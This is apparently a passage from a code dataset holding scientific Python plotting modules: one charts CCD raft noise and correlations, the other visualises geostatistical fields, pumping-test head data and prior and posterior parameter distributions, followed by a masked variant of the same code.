100, 10):\n plt.subplot(3, 3, bin_num / 10)\n plt.hist(nd_all, bin_num, facecolor='green')\n plt.title('Bins = ' + str(bin_num))\n\n fig.suptitle('dnoise histogram ' + TITLE, y=0.92, size=20)\n plt.subplots_adjust(wspace=0.2, hspace=0.2)\n plt.savefig(OUT_DIR + TITLE + '_stddelta_histo.png')\n plt.close(fig)\n\n\ndef plot_histogram_all(m, n, nd, TITLE, OUT_DIR):\n plot_histogram_mean(m, TITLE, OUT_DIR)\n plot_histogram_std(n, TITLE, OUT_DIR)\n plot_histogram_std_dev(nd, TITLE, OUT_DIR)\n\n\ndef plot_histogram_all_one_binning(m, n, nd, TITLE, OUT_DIR, bin_num=45,\n num_ccd=9, omit_REBs=[], read_REBs=set([0, 1, 2])):\n from matplotlib.patches import Rectangle\n\n if num_ccd != len(read_REBs) * 3:\n print \"ERROR! num_ccd = %i while number of REBs being read is %i.\" % (\n num_ccd, len(read_REBs)\n )\n return \"\\n\"\n\n fig = plt.figure(figsize=(15, 6))\n m_all = m.ravel()\n m_all = m_all[0:16 * num_ccd]\n n_all = n.ravel()\n n_all = n_all[0:16 * num_ccd]\n nd_all = nd.ravel()\n nd_all = nd_all[0:16 * num_ccd]\n\n # detect dead channels, DEF: noise <= 5\n dead = []\n for i in range(16 * num_ccd):\n if n_all[i] <= 5:\n dead.append(i)\n\n # not count not-clocking REBs for statistics\n # data stored in order 22, 21, 20 (REB 2), 12, 11, 10 (REB 1),...\n omit_REBs = set(omit_REBs)\n for REB in omit_REBs:\n if REB not in [0, 1, 2]:\n print \"WARNING! Wrong configuration of REBs to omit %s - unrecognized REBs.\\nContinuing with all REBs.\" % str(omit_REBs)\n break\n else:\n if omit_REBs:\n print \"Omiting REBs %s\" % omit_REBs\n i = -1\n for REB in read_REBs:\n i += 1\n if REB not in omit_REBs:\n continue\n pos = len(read_REBs) - i - 1\n omit = np.arange(pos * 48, pos * 48 + 48)\n dead = np.append(dead, omit)\n\n m_no_dead = np.delete(m_all, dead)\n n_no_dead = np.delete(n_all, dead)\n\n # get rid of subtracted channels for dnoise\n sub = np.arange(7, 16 * num_ccd, 8)\n dead = np.append(dead, sub)\n\n nd_no_dead = np.delete(nd_all, dead)\n nd_all = np.delete(nd_all, sub)\n\n # summary statstics computed only with live channels\n if len(n_no_dead):\n n_mean, n_median, n_std = np.mean(\n n_no_dead), np.median(n_no_dead), np.std(n_no_dead)\n else:\n n_mean, n_median, n_std = 0, 0, 0\n if len(m_no_dead):\n m_mean, m_median, m_std = np.mean(\n m_no_dead), np.median(m_no_dead), np.std(m_no_dead)\n else:\n m_mean, m_median, m_std = 0, 0, 0\n if len(nd_no_dead):\n nd_mean, nd_median, nd_std = np.mean(\n nd_no_dead), np.median(nd_no_dead), np.std(nd_no_dead)\n else:\n nd_mean, nd_median, nd_std = 0, 0, 0\n\n bin_num_lin = 4 * bin_num / 5\n bin_num_log = 1 * bin_num / 5\n bins_lin = np.linspace(0, 30, bin_num_lin)\n val_max = max(max(n_all), max(nd_all))\n if val_max <= 30:\n val_max = 50\n bins_log = np.logspace(np.log10(30), np.log10(val_max), bin_num_log)\n\n ax1 = fig.add_subplot(1, 2, 1)\n plt.hist(m_all, bin_num, facecolor='green')\n plt.title('Offset')\n\n textstr1 = '$\\mu=%.0f$\\n$\\mathrm{median}=%.0f$\\n$\\sigma=%.0f$' % (\n m_mean, m_median, m_std)\n props1 = dict(boxstyle='round', facecolor='green', alpha=0.4)\n ax1.text(0.76, 0.97, textstr1, transform=ax1.transAxes, fontsize=10,\n verticalalignment='top', bbox=props1)\n\n ax2 = fig.add_subplot(1, 2, 2)\n plt.hist(n_all, bins_lin, facecolor='blue', alpha=0.5, label='noise')\n plt.hist(nd_all, bins_lin, facecolor='red', alpha=0.5, label='dnoise')\n plt.title('Noises')\n plt.legend(loc='upper left')\n ax2.axvspan(0, 5, hatch='x', fill=False)\n ax2.set_xscale('linear')\n ax2.set_xlim((0, 30))\n ax2.set_xlim(left=0)\n ax2.spines['right'].set_visible(False)\n ax2.yaxis.set_ticks_position('left')\n plt.setp(ax2.get_xticklabels(), visible=True)\n\n divider = make_axes_locatable(ax2)\n axLin = divider.append_axes(\"right\", size=1.4, pad=0, sharey=ax2)\n axLin.set_xscale('log')\n axLin.hist(n_all, bins_log, facecolor='blue', alpha=0.5, label='noise')\n axLin.hist(nd_all, bins_log, facecolor='red', alpha=0.5, label='dnoise')\n axLin.autoscale()\n axLin.set_xlim(left=30)\n axLin.spines['left'].set_visible(False)\n axLin.yaxis.set_visible(False)\n axLin.yaxis.set_ticks_position('left')\n\n textstr2 = '$\\mu=%.1f$\\n$\\mathrm{median}=%.1f$\\n$\\sigma=%.1f$' % (\n n_mean, n_median, n_std)\n props2 = dict(boxstyle='round', facecolor='blue', alpha=0.4)\n plt.text(1.98, 0.97, textstr2, transform=ax1.transAxes, fontsize=10,\n verticalalignment='top', bbox=props2)\n\n textstr3 = '$\\mu=%.1f$\\n$\\mathrm{median}=%.1f$\\n$\\sigma=%.1f$' % (\n nd_mean, nd_median, nd_std)\n props3 = dict(boxstyle='round', facecolor='red', alpha=0.4)\n plt.text(1.98, 0.80, textstr3, transform=ax1.transAxes, fontsize=10,\n verticalalignment='top', bbox=props3)\n\n fig.suptitle(TITLE, y=0.98, size=20)\n#\tplt.subplots_adjust(wspace=0.2, hspace=0.2)\n plt.savefig(OUT_DIR + TITLE + '_histo.png')\n plt.close(fig)\n string_info = \"\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\n\" % (\n m_mean, m_median, m_std, n_mean, n_median, n_std, nd_mean, nd_median, nd_std)\n return string_info\n\n\ndef plot_summary(data, run, OUT_DIR, SUPTITLE=\"Runs comparison\"):\n cols = len(data)\n fig = plt.figure(figsize=(25, 9))\n x = range(cols)\n\n ax1 = plt.subplot(3, 1, 1)\n ax1.plot(x, data[:, 0], 'o', color='darkgreen', label='mean')\n ax1.errorbar(x, data[:, 0], marker='o',\n color='darkgreen', yerr=data[x, 2], linestyle='None')\n ax1.plot(x, data[:, 1], 'o', color='greenyellow', label='median')\n ax1.set_ylabel('Offset', color='green')\n ax1.legend(numpoints=1)\n\n ax2 = plt.subplot(3, 1, 2)\n ax2.plot(x, data[:, 3], 'o', color='darkblue', label='mean')\n ax2.errorbar(x, data[:, 3], marker='o', color='darkblue',\n yerr=data[x, 5], linestyle='None')\n ax2.plot(x, data[:, 4], 'o', color='lightskyblue', label='median')\n ax2.set_ylabel('Noise', color='blue')\n ax2.set_ylim([0, 20])\n# ax2.set_ylim(bottom=0)\n ax2.legend(numpoints=1)\n\n ax3 = plt.subplot(3, 1, 3)\n ax3.plot(x, data[:, 6], 'o', color='darkred', label='mean')\n ax3.errorbar(x, data[:, 6], marker='o', color='darkred',\n yerr=data[x, 8], linestyle='None')\n ax3.plot(x, data[:, 7], 'o', color='salmon', label='median')\n ax3.set_ylabel('DNoise', color='red')\n ax3.set_ylim([0, 20])\n# ax3.set_ylim(bottom=0)\n ax3.legend(numpoints=1)\n\n plt.xticks(x, run, rotation=45, ha='right', fontsize=7)\n fig.suptitle(SUPTITLE, y=0.96, size=20)\n plt.subplots_adjust(hspace=0.0, bottom=0.20, left=0.05)\n\n plt.savefig(OUT_DIR + 'Runs_summary.png')\n plt.close(fig)\n\n\ndef plot_one_run_summary(f, OUT_DIR, SUPTITLE=\"Run summary\"):\n data = np.loadtxt(f, usecols=range(1, 10))\n run = np.loadtxt(f, usecols=[0], dtype=str)\n if data.size == 9:\n print \"WARNING! Only one row in '%s'. Summary is not plotting.\\n\" % f\n return\n plot_summary(data, run, OUT_DIR, SUPTITLE)\n\n\ndef plot_cor_ccd(a, img, TITLE, OUT_DIR, vmin=0, vmax=0.2):\n fig = plt.figure(figsize=(15, 15))\n seg = [0, 7, 8, 15]\n lab = [\"0\", \"7\", \"10\", \"17\"]\n for i, f in enumerate(img):\n ax1 = plt.subplot(3, 3, f.dev_index + 1)\n\n i_min = 16 * i\n i_max = i_min + 16\n aa = a[i_min:i_max, i_min:i_max]\n im = plt.imshow(aa, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)\n ax1.set_title(f.dev_name)\n ax1.set_xlim(15.5, -0.5)\n ax1.set_ylim(-0.5, 15.5)\n ax1.set_xticks(seg)\n ax1.set_xticklabels(lab)\n ax1.set_yticks(seg)\n ax1.set_yticklabels(lab)\n fig.subplots_adjust(right=0.8)\n cbar_ax = fig.add_axes([0.85, 0.137, 0.05, 0.73])\n fig.colorbar(im, cax=cbar_ax)\n fig.suptitle(\"Inter CCD correlations \" + TITLE, y=0.93, size=20)\n plt.savefig(OUT_DIR + TITLE + '_cor_ccd.png')\n plt.close(fig)\n\n\ndef plot_cor_all(a, img, TITLE, OUT_DIR, vmin=0, vmax=0.2):\n fig = plt.figure(figsize=(15, 15))\n im = plt.imshow(a, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)\n seg = np.arange(0, len(a), 16)\n r = img.ccd_num / 9.0\n plt.xticks(seg)\n plt.yticks(seg)\n\n for i, f in enumerate(img):\n plt.text(-10 * r, 8 + 16 * i, f.dev_name,\n size=15, verticalalignment='center')\n\n widthB = 54 / img.ccd_num\n widthB = str(widthB)\n\n for i in np.arange(0, img.ccd_num, 3):\n REB = 'REB' + img[i].dev_name[1:2]\n plt.annotate(REB, xy=(-11 * r, 24 + i * 16), xytext=(-18 * r, 24 + i * 16), xycoords='data',\n fontsize=20, annotation_clip=False, ha='center', va='center',\n arrowprops=dict(arrowstyle='-[, widthB=%s, lengthB=1.5' % widthB, lw=2.0))\n\n fig.subplots_adjust(right=0.82)\n cbar_ax = fig.add_axes([0.85, 0.155, 0.05, 0.695])\n fig.colorbar(im, cax=cbar_ax)\n fig.suptitle(\"Overall correlations \" + TITLE, y=0.91, size=20)\n plt.savefig(OUT_DIR + TITLE + '_cor_all.png')\n plt.close(fig)\n\ndef plot_cor_ccd_mean(a, img, TITLE, OUT_DIR, vmin=-1, vmax=1):\n fig = plt.figure(figsize=(15, 15))\n im = plt.imshow(a, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)\n\n loc = range(img.ccd_num)\n labels = []\n for fli in img:\n labels.append(fli.dev_name)\n\n plt.xticks(loc, labels)\n plt.yticks(loc, labels)\n\n fig.subplots_adjust(right=0.82)\n cbar_ax = fig.add_axes([0.85, 0.155, 0.05, 0.695])\n fig.colorbar(im, cax=cbar_ax)\n fig.suptitle(\"Correlations of means of CCDs \" + TITLE, y=0.91, size=20)\n plt.savefig(OUT_DIR + TITLE + '_cor_ccd_mean.png')\n plt.close(fig)\n\ndef plot_gains(gains, gain_ref, TITLES, OUT_DIR):\n \"\"\" plot gains with respect to the reference gain,\n whre reference gain is number => gains[gain_ref]\"\"\"\n\n# print 'directory: %s' % OUT_DIR\n# print 'TITLES:%s', TITLES\n\n gain_ref_np = np.array(gains[gain_ref].gain)\n ratios = []\n for gain in gains:\n gain_np = np.array(gain.gain)\n dim = (min(gain_ref_np.shape[0], gain_np.shape[0]),\n min(gain_ref_np.shape[1], gain_np.shape[1])\n )\n# print 'dim = ', dim\n ratios.append(gain_np[0:dim[0], 0:dim[1]] / gain_ref_np[0:dim[0], 0:dim[1]])\n\n# print 'Ratios = ', ratios\n\n rows = 2*((len(ratios) -1) / 6 + 1)\n cmap = plt.get_cmap('gnuplot')\n colors = [cmap(i) for i in np.linspace(0, 1, len(ratios))]\n fig, axes = plt.subplots(nrows=rows, ncols=6)\n fig.set_size_inches(20,20)\n axfl = axes.flatten()\n for i, ratio in enumerate(ratios):\n# print 'Plotting %s', TITLES[i]\n\tj = (i / 6)*12 + i % 6\n ax = axfl[j]\n ax2 = axfl[j+6]\n ax.hist(np.reshape(ratio, -1), 20, range=(0.9, 1.1), facecolor=colors[i])\n ax.set_title(TITLES[i], size=20)\n ax2.hist(np.reshape(ratio, -1), 50, range=(0., 2.), facecolor=colors[i])\n\n fig.suptitle(\"Gains with ref gain '%s'\" % TITLES[gain_ref], y=0.95, size=25)\n # fig.tight_layout()\n plt.savefig(OUT_DIR + 'gain.png')\n plt.close(fig)\n\ndef plot_raft_map(data, img, TITLE, OUTDIR, vmin=None, vmax=None):\n \"\"\" create a raft map 6x24 for data in CCDsx16 array \"\"\"\n\n map = np.zeros((6, 24))\n for i, fli in enumerate(img):\n x = (fli.dev_index / 3) * 2 # [0, 2, 4]\n y = (fli.dev_index % 3) * 8 # [0, 8, 16]\n for j in range(16):\n xx = x + j / 8 # [0, 1,..., 5]\n yy = y + j % 8 # [0, 1,..., 23]\n map[xx, yy] = data[i, j]\n\n yseg = range(6)\n ylab = [\"00-07\", \"10-17\", \"00-07\", \"10-17\", \"00-07\", \"10-17\"]\n xseg = range(0, 24, 4)\n xlab = [\"0\", \"4\", \"0\", \"4\", \"0\", \"4\"]\n\n fig = plt.figure(figsize=(10, 10))\n ax1 = fig.add_subplot(111)\n im = ax1.imshow(map, interpolation='nearest', cmap='jet', aspect=4, vmin=vmin, vmax=vmax)\n plt.yticks(yseg, ylab)\n plt.xticks(xseg, xlab)\n plt.annotate('S22', xy=(0, 0), xytext=(4, -0.8), fontsize=15, ha='center', va='center')\n plt.annotate('S12', xy=(0, 0), xytext=(12, -0.8), fontsize=15, ha='center', va='center')\n plt.annotate('S02', xy=(0, 0), xytext=(20, -0.8), fontsize=15, ha='center', va='center')\n plt.annotate('S02', xy=(0, 0), xytext=(24., 0.5), fontsize=15, ha='left', va='center')\n plt.annotate('S01', xy=(0, 0), xytext=(24., 2.5), fontsize=15, ha='left', va='center')\n plt.annotate('S00', xy=(0, 0), xytext=(24., 4.5), fontsize=15, ha='left', va='center')\n ax1.vlines(7.5, -0.5, 5.5)\n ax1.vlines(15.5, -0.5, 5.5)\n ax1.hlines(1.5, -0.5, 23.5)\n ax1.hlines(3.5, -0.5, 23.5)\n plt.subplots_adjust(left=0.07, bottom=0.05, right=0.8, top=0.95, wspace=0, hspace=0)\n #cbar_ax = fig.add_axes([0.15, 0.03, 0.7, 0.05])\n #fig.colorbar(im, cax=cbar_ax, orientation=\"horizontal\")\n cbar_ax = fig.add_axes([0.87, 0.15, 0.05, 0.7])\n fig.colorbar(im, cax=cbar_ax)\n fig.suptitle(TITLE, y=0.98, size=19)\n plt.savefig(OUTDIR + TITLE + '.png')\n plt.show()\n plt.close(fig)\n\ndef plot_voltage_all(x, data, imgs, title, out_dir, suptitle=''):\n if suptitle == '':\n suptitle = title\n fig = plt.figure(figsize=(20, 24))\n\n cmap = plt.get_cmap('gist_ncar')\n colors = [cmap(i) for i in np.linspace(0, 1, 16)]\n\n for k in range(9):\n ax1 = plt.subplot(3, 3, imgs[0][k].dev_index + 1)\n ax1.set_title(imgs[0][k].dev_name)\n for j in range(16):\n y = []\n for i in range(len(x)):\n y.append(data[i][k][j])\n plt.plot(x, y, label='Segment %i' % j, color=colors[j])\n\n fig.suptitle(suptitle + '; all segments', y=0.99, size=20)\n plt.legend(loc='lower left', bbox_to_anchor=(0.87, 1.1), ncol=4)\n plt.subplots_adjust(bottom=0.04, left=0.04, top=0.88, right=0.96, wspace=0.1, hspace=0.1)\n plt.savefig(out_dir + title + '_all.png')\n plt.close(fig)\n\ndef plot_voltage_ccd(x, data, imgs, title, out_dir, suptitle=''):\n if suptitle == '':\n suptitle = title\n fig = plt.figure(figsize=(15, 15))\n for k in range(9):\n ax1 = plt.subplot(3, 3, imgs[0][k].dev_index + 1) \n ax1.set_title(imgs[0][k].dev_name)\n y = []\n for i in range(len(x)):\n y.append(np.mean(data[i][k]))\n \n plt.plot(x, y)\n \n fig.suptitle(suptitle + '; mean of segments, per CCD', y=0.94, size=20)\n plt.savefig(out_dir + title + '_CCD.png')\n plt.close(fig)\n\ndef plot_voltage_raft(x, data, imgs, title, out_dir, suptitle=''):\n if suptitle == '':\n suptitle = title\n fig = plt.figure(figsize=(7, 7))\n y = []\n for i in range(len(x)):\n y.append(np.mean(data[i]))\n plt.plot(x, y)\n\n fig.suptitle(suptitle + '; mean of all segments', y=0.96, size=20)\n plt.savefig(out_dir + title + '_raft.png')\n plt.close(fig)\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Author: Lijing Wang ([email protected]), 2021
import numpy as np
import pandas as pd
import gstools as gs
import matplotlib.pyplot as plt
from matplotlib import patches
import seaborn as sns
plt.rcParams.update({'font.size': 15})
import os
path = os.path.dirname(os.getcwd())
subpath = '/examples/case2_nonlinear_forward_pumping_test/'
num_prior_sample = 5000
num_x = 100
num_y = 100
def print_theta(theta, name = 'theta'):
theta_pd = pd.DataFrame(theta.reshape(1,-1), index = [name], columns = ['mean','variance','max_range','min_range','anisotropy','head_west'])
print(theta_pd)
def visualize_d_2D(d):
num_block = 3
d_vis = np.zeros(num_m)
d_vis[:] = np.nan
for i in range(num_block*num_block*2):
d_vis[np.where(G[i,:]>0)[0]] = d[i]
d_vis = d_vis.reshape(num_x,num_y)
return d_vis
def visualize_one_d(d):
plt.plot(np.arange(70)/10, d.reshape(70,1)[:,0],label = 'pumping well')
plt.xlabel('Days')
plt.ylabel('Head')
plt.legend()
def visualize_one_m(m, vmin = -4, vmax = 0, cmap = 'viridis',title = 'True spatial field, m'):
fig, ax = plt.subplots(figsize = [6,6])
m_show = ax.imshow(m.T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
ax.set_xticks([])
ax.set_yticks([])
if title:
ax.set_title(title,fontsize = 13)
well_location = [49,49]
direct_data_loc = [30,70]
ax.scatter(well_location[0],well_location[1],s = 100, color = 'black', label = 'indirect pumping well')
ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 100, color = 'red', label = 'direct logK')
ax.legend()
fig.colorbar(m_show, ax = ax, shrink = 0.6)
def print_theta_multiple(theta, name = 'theta',head = 8):
theta_pd = pd.DataFrame(theta, index = ['theta_'+str(i) for i in np.arange(1,theta.shape[0]+1)], columns = ['mean','variance','max_range','min_range','anisotropy','head_west'])
print(theta_pd.head(head))
def visualize_multiple_m(m, head = 4, vmin = -4, vmax = 0, cmap = 'viridis', theta = None):
plt.figure(figsize = [20,8])
for i in np.arange(head):
ax = plt.subplot(1, 4, i+1)
ax.imshow(m[i,:,:].T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
ax.set_xticks([])
ax.set_yticks([])
well_location = [49,49]
direct_data_loc = [30,70]
ax.scatter(well_location[0],well_location[1],s = 50, color = 'black', label = 'pumping well')
ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 50, color = 'red', label = 'direct logK')
if theta is not None:
ax.set_title('\u03B8 = '+str(tuple(np.round(theta[i,:],1))))
def visualize_multiple_pc(m, PCA, head = 8, vmin = -4, vmax = 0, cmap = 'viridis',rect = False):
plt.figure(figsize = [25,10])
for i in np.arange(head):
ax = plt.subplot(1, 10, i+1)
ax.imshow(m[i,:].reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
if rect:
rect = patches.Rectangle((32,32),36, 36, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
ax.set_title('PCA '+str(i+1)+': '+str(np.int(PCA['explained_variance'][i]*100))+'%')
def visualize_multiple_d(d, head = 4):
plt.figure(figsize = [25,3])
for i in np.arange(head):
ax = plt.subplot(1, 4, i+1)
ax.plot(np.arange(70)/10, d[:,i].reshape(70,1)[:,0],label = 'pumping well')
#ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,1],label = 'obs well: SW')
#ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,2],label = 'obs well: NE')
##ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,3],label = 'obs well: NW')
#ax.plot(np.arange(70)/10, d[:,i].reshape(70,5)[:,4],label = 'obs well: SE')
ax.set_xlabel('Days')
ax.set_ylabel('Head')
#ax.legend()
def colors_from_values(values, palette_name):
# normalize the values to range [0, 1]
normalized = (values - min(values)) / (max(values) - min(values))
# convert to indices
indices = np.round(normalized * (len(values) - 1)).astype(np.int32)
# use the indices to get the colors
palette = sns.color_palette(palette_name, len(values))
return np.array(palette).take(indices, axis=0)
def visualize_mean_var(mu, covariance, vmin = 20, vmax = 40, cmap = 'viridis'):
var = np.diag(covariance)
plt.figure(figsize = [18,4])
ax = plt.subplot(2, 4, 1)
ax.imshow(mu.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
rect = patches.Rectangle((start_loc_x,start_loc_y),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
rect = patches.Rectangle((start_loc_x+num_grid*2,start_loc_y),num_grid,num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
ax = plt.subplot(2, 4, 2)
ax.imshow(var.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = 0, vmax = 16)
rect = patches.Rectangle((start_loc_x,start_loc_y),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
rect = patches.Rectangle((start_loc_x+num_grid*2,start_loc_y),num_grid,num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
def visualize_mean_var_MC(m, start_loc, num_grid,vmin = -3, vmax = 1,vmin_var = 0, vmax_var = 0.2, cmap = 'viridis', rect = False):
mu = np.mean(m,axis = 0)
var = np.var(m,axis = 0)
plt.figure(figsize = [10,4])
ax = plt.subplot(1, 2, 1)
ax.imshow(mu.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)
if rect:
rect = patches.Rectangle((start_loc,start_loc),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
well_location = [49,49]
ax.scatter(well_location[0],well_location[1],s = 20, color = 'black', label = 'pumping well')
direct_data_loc = [30,70]
ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 50, color = 'red', label = 'direct logK')
ax = plt.subplot(1, 2, 2)
ax.imshow(var.reshape(num_x,num_y).T, origin = 'lower', cmap = 'magma', vmin = vmin_var, vmax = vmax_var)
if rect:
rect = patches.Rectangle((start_loc,start_loc),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')
ax.add_patch(rect)
ax.set_xticks([])
ax.set_yticks([])
def visualize_ensemble_d(d,d_obs,ymin = None,ymax = 11.5):
plt.plot(np.arange(70)/10, d,color = 'C0')
plt.plot(np.arange(70)/10, d_obs,color = 'C1',linewidth = 2,label = 'observed data')
plt.xlabel('Days')
plt.ylabel('Head')
plt.legend()
plt.ylim(ymin,ymax)
# Visualization: updating theta
def pos_pairplot(theta_pos, theta_name):
sns.pairplot(pd.DataFrame(theta_pos.T,columns = theta_name),kind="hist")
def prior_pos_theta(theta, theta_pos, theta_true, theta_name):
num_theta = theta.shape[1]
plt.figure(figsize=[25,10])
for i in np.arange(num_theta):
ax = plt.subplot(2, 3, i+1)
ax.hist(theta[:,i],density=True, bins = 1,label = 'prior',alpha = 0.7)
y_, _, _ = ax.hist(theta_pos[i,:],density=True, bins = 20,label = 'posterior',alpha = 0.7)
ax.vlines(x = theta_true[i], ymin = 0, ymax = np.max(y_),linestyles='--',label = 'true',color = 'black')
ax.legend()
ax.set_title(theta_name[i])
ax.set_ylabel('pdf')
def ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test, S_d_obs, theta_name):
fig = plt.figure(figsize=[24,10])
num_theta = len(theta_name)
for i in np.arange(num_theta):
ax = plt.subplot(2, 3, i+1)
ax.plot(pred_train[:,i], y_train[:,i],'.',label = 'train')
ax.plot(pred_test[:,i], y_test[:,i],'.',label = 'test')
ax.vlines(x = S_d_obs[0,i],ymin = -1, ymax = 1, linestyles='--',color = 'black',zorder = 100)
ax.plot([-1.2,1.2],[-1.2,1.2])
ax.legend()
ax.set_xlabel('S(d_'+str(i+1)+')')
ax.set_ylabel(theta_name[i]+'_rescaled')
ax.set_xlim(-1.2,1.2)
ax.set_ylim(-1.2,1.2)
def history_plot(history):
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
|
normal
|
{
"blob_id": "09fb99a15c2727da2ef96028aca5513337449f62",
"index": 3772,
"step-1": "<mask token>\n\n\ndef print_theta(theta, name='theta'):\n theta_pd = pd.DataFrame(theta.reshape(1, -1), index=[name], columns=[\n 'mean', 'variance', 'max_range', 'min_range', 'anisotropy',\n 'head_west'])\n print(theta_pd)\n\n\n<mask token>\n\n\ndef visualize_one_m(m, vmin=-4, vmax=0, cmap='viridis', title=\n 'True spatial field, m'):\n fig, ax = plt.subplots(figsize=[6, 6])\n m_show = ax.imshow(m.T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n ax.set_xticks([])\n ax.set_yticks([])\n if title:\n ax.set_title(title, fontsize=13)\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=100, color='black',\n label='indirect pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=100, color='red',\n label='direct logK')\n ax.legend()\n fig.colorbar(m_show, ax=ax, shrink=0.6)\n\n\n<mask token>\n\n\ndef visualize_multiple_m(m, head=4, vmin=-4, vmax=0, cmap='viridis', theta=None\n ):\n plt.figure(figsize=[20, 8])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.imshow(m[i, :, :].T, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax\n )\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49, 49]\n direct_data_loc = [30, 70]\n ax.scatter(well_location[0], well_location[1], s=50, color='black',\n label='pumping well')\n ax.scatter(direct_data_loc[0], direct_data_loc[1], s=50, color=\n 'red', label='direct logK')\n if theta is not None:\n ax.set_title('θ = ' + str(tuple(np.round(theta[i, :], 1))))\n\n\n<mask token>\n\n\ndef visualize_multiple_d(d, head=4):\n plt.figure(figsize=[25, 3])\n for i in np.arange(head):\n ax = plt.subplot(1, 4, i + 1)\n ax.plot(np.arange(70) / 10, d[:, i].reshape(70, 1)[:, 0], label=\n 'pumping well')\n ax.set_xlabel('Days')\n ax.set_ylabel('Head')\n\n\ndef colors_from_values(values, palette_name):\n normalized = (values - min(values)) / (max(values) - min(values))\n indices = np.round(normalized * (len(values) - 1)).astype(np.int32)\n palette = sns.color_palette(palette_name, len(values))\n return np.array(palette).take(indices, axis=0)\n\n\ndef visualize_mean_var(mu, covariance, vmin=20, vmax=40, cmap='viridis'):\n var = np.diag(covariance)\n plt.figure(figsize=[18, 4])\n ax = plt.subplot(2, 4, 1)\n ax.imshow(mu.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n vmin, vmax=vmax)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n ax = plt.subplot(2, 4, 2)\n ax.imshow(var.reshape(num_x, num_y).T, origin='lower', cmap=cmap, vmin=\n 0, vmax=16)\n rect = patches.Rectangle((start_loc_x, start_loc_y), num_grid, num_grid,\n linewidth=2, linestyle='dashed', edgecolor='black', facecolor=\n 'None', label='pilot area')\n ax.add_patch(rect)\n rect = patches.Rectangle((start_loc_x + num_grid * 2, start_loc_y),\n num_grid, num_grid, linewidth=2, linestyle='dashed', edgecolor=\n 'black', facecolor='None', label='pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\n\n<mask token>\n\n\ndef visualize_ensemble_d(d, d_obs, ymin=None, ymax=11.5):\n plt.plot(np.arange(70) / 10, d, color='C0')\n plt.plot(np.arange(70) / 10, d_obs, color='C1', linewidth=2, label=\n 'observed data')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin, ymax)\n\n\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T, columns=theta_name), kind='hist')\n\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25, 10])\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.hist(theta[:, i], density=True, bins=1, label='prior', alpha=0.7)\n y_, _, _ = ax.hist(theta_pos[i, :], density=True, bins=20, label=\n 'posterior', alpha=0.7)\n ax.vlines(x=theta_true[i], ymin=0, ymax=np.max(y_), linestyles='--',\n label='true', color='black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test,\n S_d_obs, theta_name):\n fig = plt.figure(figsize=[24, 10])\n num_theta = len(theta_name)\n for i in np.arange(num_theta):\n ax = plt.subplot(2, 3, i + 1)\n ax.plot(pred_train[:, i], y_train[:, i], '.', label='train')\n ax.plot(pred_test[:, i], y_test[:, i], '.', label='test')\n 